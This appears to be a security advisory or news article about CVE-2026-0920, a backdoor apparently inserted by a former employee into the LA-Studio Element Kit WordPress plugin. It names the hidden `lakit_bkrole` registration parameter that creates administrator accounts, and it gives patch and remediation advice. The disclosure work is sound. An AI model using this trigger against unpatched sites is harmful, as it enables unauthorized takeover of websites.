Critical Backdoor Vulnerability in LA-Studio Element Kit Puts 20,000 WordPress Sites at Risk
A severe security flaw has been identified in the LA-Studio Element Kit for Elementor, a widely used WordPress plugin with over 20,000 active installations. This vulnerability enables unauthorized creation of administrator accounts, potentially leading to full site control by malicious actors. Designated as CVE-2026-0920, the flaw has been assigned a critical CVSS score of 9.8, underscoring the urgent need for immediate remediation.
Discovery and Exploitation Details
The vulnerability was introduced by a former employee who departed from LA-Studio in late December 2025. Prior to leaving, the individual inserted concealed code into the plugin, facilitating unauthorized administrative access. This incident highlights the significant risks associated with insider threats and emphasizes the necessity for rigorous code reviews during staff transitions.
Security experts Athiwat Tiprasaharn, Itthidej Aramsri, and Waris Damkham uncovered the backdoor on January 12, 2026, and promptly reported it through the Wordfence Bug Bounty Program. The vulnerability was swiftly addressed with the release of version 1.6.0 on January 14, 2026, just two days after its discovery.
Technical Analysis
The flaw resides in all versions up to and including 1.5.6.3 of the LA-Studio Element Kit for Elementor plugin. Attackers can exploit this vulnerability by sending a specially crafted registration request containing the `lakit_bkrole` parameter. Upon successful exploitation, they gain full administrative privileges on the targeted WordPress site, enabling them to upload malicious files, alter content, redirect visitors to harmful websites, or inject spam.
Vulnerability Details:
– Vulnerability Name: Unauthenticated Privilege Escalation via Backdoor to Administrative User Creation
– CVE ID: CVE-2026-0920
– CVSS Score: 9.8 (Critical)
– Affected Plugin: LA-Studio Element Kit for Elementor
– Plugin Slug: lastudio-element-kit
– Affected Versions: ≤ 1.5.6.3
– Patched Version: 1.6.0
– Active Installations: 20,000+
– Attack Vector: `lakit_bkrole` parameter in registration request
– Vulnerability Type: Backdoor / Administrative User Creation
– Discoverers: Athiwat Tiprasaharn, Itthidej Aramsri, Waris Damkham
– Bounty Amount: $975.00
– Discovery Date: January 12, 2026
– Patch Release Date: January 14, 2026
– Wordfence Protection: January 13, 2026 (Premium), February 12, 2026 (Free)
Obfuscation Techniques
The backdoor was deliberately obfuscated to evade detection during security assessments. This evasion strategy allowed the malicious code to remain undetected within the plugin’s codebase. The obfuscated code specifically targeted the user registration process, assigning administrator capabilities to newly created accounts when the hidden parameter was present.
Mechanism of the Backdoor
The backdoor operates through a concealed modification within the plugin’s registration handling system. Analysis revealed that the `ajax_register_handle` function contained obfuscated logic checking for the `lakit_bkrole` parameter during user registration. If this parameter was detected, the function would trigger additional filters assigning administrator privileges to the new account. The obfuscation included techniques like string manipulation and indirect function calls, making the malicious code blend seamlessly with legitimate plugin functionality. This clever disguise allowed the backdoor to bypass standard security audits.
Recommendations for Site Administrators
Administrators using the LA-Studio Element Kit for Elementor plugin should take the following actions immediately:
1. Update the Plugin: Ensure the plugin is updated to version 1.6.0 or later to patch the vulnerability.
2. Review User Accounts: Examine the list of user accounts for any unauthorized administrators and remove them promptly.
3. Conduct Security Audits: Perform comprehensive security audits to detect any signs of compromise or unauthorized changes.
4. Enhance Monitoring: Implement monitoring tools to detect unusual activities, such as unexpected user account creations or modifications.
5. Educate Staff: Raise awareness among staff about the risks of insider threats and the importance of secure coding practices.
Broader Implications
This incident underscores the critical importance of internal security measures and the potential risks posed by insider threats. Organizations must establish robust protocols for code reviews, especially during employee transitions, to prevent similar vulnerabilities. Regular security assessments and prompt updates are essential to maintain the integrity and security of WordPress sites.
Conclusion
The discovery of this backdoor vulnerability in the LA-Studio Element Kit for Elementor plugin serves as a stark reminder of the ever-present threats in the digital landscape. By taking immediate action to update the plugin and implement recommended security practices, site administrators can protect their websites from potential exploitation and ensure a secure environment for their users.
